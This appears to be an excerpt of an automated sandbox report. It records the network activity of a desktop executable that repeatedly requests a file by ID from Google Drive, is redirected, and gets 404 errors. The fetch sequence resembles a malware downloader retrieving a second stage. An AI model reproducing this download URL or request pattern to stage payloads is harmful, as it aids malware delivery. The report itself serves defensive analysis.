                                                            Jan 10, 2025 15:57:15.477061987 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.215559959 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.215898037 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.216352940 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.216427088 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.218329906 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.218362093 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.218611956 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.218664885 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.219897032 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.263329029 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.616677046 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.616776943 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.616789103 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.616836071 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.617001057 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.617037058 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.617212057 CET44349979142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:16.617253065 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.617253065 CET49979443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:16.650754929 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:16.650829077 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:16.650919914 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:16.651190042 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:16.651206017 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.290888071 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.291037083 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.291627884 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.291659117 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.291793108 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.291806936 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.698515892 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.698585987 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.698654890 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.698681116 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.698681116 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.698719025 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.699407101 CET49980443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:17.699428082 CET44349980142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:17.851983070 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:17.852054119 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:17.852317095 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:17.853038073 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:17.853049994 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.481798887 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.481944084 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.482528925 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.482610941 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.484097958 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.484108925 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.484339952 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.484400988 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.484724998 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.527340889 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.893218994 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.893384933 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.893409967 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.893471003 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.893604994 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.893639088 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.893802881 CET44349981142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:18.893863916 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.893882990 CET49981443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:18.917033911 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:18.917085886 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:18.917162895 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:18.917476892 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:18.917493105 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:19.578403950 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:19.578530073 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:19.579101086 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:19.579123974 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:19.579257011 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:19.579269886 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:20.006863117 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:20.007028103 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:20.007055998 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:20.007086992 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:20.007097006 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:20.007186890 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:20.007256985 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:20.007869959 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:20.007888079 CET44349982142.250.185.97192.168.2.7
                                                            Jan 10, 2025 15:57:20.007916927 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:20.007936001 CET49982443192.168.2.7142.250.185.97
                                                            Jan 10, 2025 15:57:20.166724920 CET49983443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:20.166778088 CET44349983142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:20.167602062 CET49983443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:20.167602062 CET49983443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:20.167639971 CET44349983142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:20.814476013 CET44349983142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:20.814590931 CET49983443192.168.2.7142.250.184.238
                                                            Jan 10, 2025 15:57:20.815263987 CET44349983142.250.184.238192.168.2.7
                                                            Jan 10, 2025 15:57:20.815329075 CET49983443192.168.2.7142.250.184.238
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 10, 2025 15:57:05.851869106 CET5498553192.168.2.71.1.1.1
                                                            Jan 10, 2025 15:57:05.859226942 CET53549851.1.1.1192.168.2.7
                                                            Jan 10, 2025 15:57:07.051259995 CET5411853192.168.2.71.1.1.1
                                                            Jan 10, 2025 15:57:07.058032990 CET53541181.1.1.1192.168.2.7
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 10, 2025 15:57:05.851869106 CET192.168.2.71.1.1.10xd1cdStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 15:57:07.051259995 CET192.168.2.71.1.1.10xc904Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 10, 2025 15:57:05.859226942 CET1.1.1.1192.168.2.70xd1cdNo error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 15:57:07.058032990 CET1.1.1.1192.168.2.70xc904No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                                            • drive.google.com
                                                            • drive.usercontent.google.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749971142.250.184.2384438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:06 UTC216OUTGET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            2025-01-10 14:57:07 UTC1920INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:06 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-S53f9NrDmO8NFfNGJEQpXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749972142.250.185.974438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:07 UTC258OUTGET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            2025-01-10 14:57:08 UTC2226INHTTP/1.1 404 Not Found
                                                            X-GUploader-UploadID: AFiumC4tlo1Weq1gU6ppUhbjcd25z2aUL8wYSSQBzwA2cUE8H4SpBFA-YE5XcnOTTtIbFcXpOi8GZvA
                                                            Content-Type: text/html; charset=utf-8
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:07 GMT
                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-9JYnqFMEw-QJgztaTjrHRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Content-Length: 1652
                                                            Server: UploadServer
                                                            Set-Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs; expires=Sat, 12-Jul-2025 14:57:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Content-Security-Policy: sandbox allow-scripts
                                                            Connection: close
                                                            2025-01-10 14:57:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 32 31 4b 6b 64 77 49 49 32 4c 67 63 30 68 6b 77 42 48 63 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="I21KkdwII2Lgc0hkwBHcrg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749973142.250.184.2384438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:08 UTC418OUTGET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:09 UTC1920INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:09 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-dR2cupsavDqeztsAnnqD9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749974142.250.185.974438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:09 UTC460OUTGET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:10 UTC1851INHTTP/1.1 404 Not Found
                                                            X-GUploader-UploadID: AFIdbgRgJqpBNZ_EZpLi7dq4UXxhBD_zpdQItzXFJerBui39qGNImpoo4NqSUgIofSh_vRbbp4460QI
                                                            Content-Type: text/html; charset=utf-8
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:10 GMT
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-e_0_PICDns5DQnp89QIEXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Content-Length: 1652
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Content-Security-Policy: sandbox allow-scripts
                                                            Connection: close
                                                            2025-01-10 14:57:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 39 34 43 47 6e 4b 44 4c 70 63 7a 41 66 32 4b 58 74 79 61 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="M94CGnKDLpczAf2KXtya0A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749975142.250.184.2384438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:11 UTC418OUTGET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:11 UTC1920INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:11 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: script-src 'nonce-Z1EPcJc6f26fViWK62lfQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749976142.250.185.974438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:12 UTC460OUTGET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:12 UTC1851INHTTP/1.1 404 Not Found
                                                            X-GUploader-UploadID: AFiumC624BWhnJA3pHghIzRf8UG8ftODgzYo46J459Cyvs8rRAclU_c0avQT5iPFBvQq8Q_nH4vDJS4
                                                            Content-Type: text/html; charset=utf-8
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:12 GMT
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
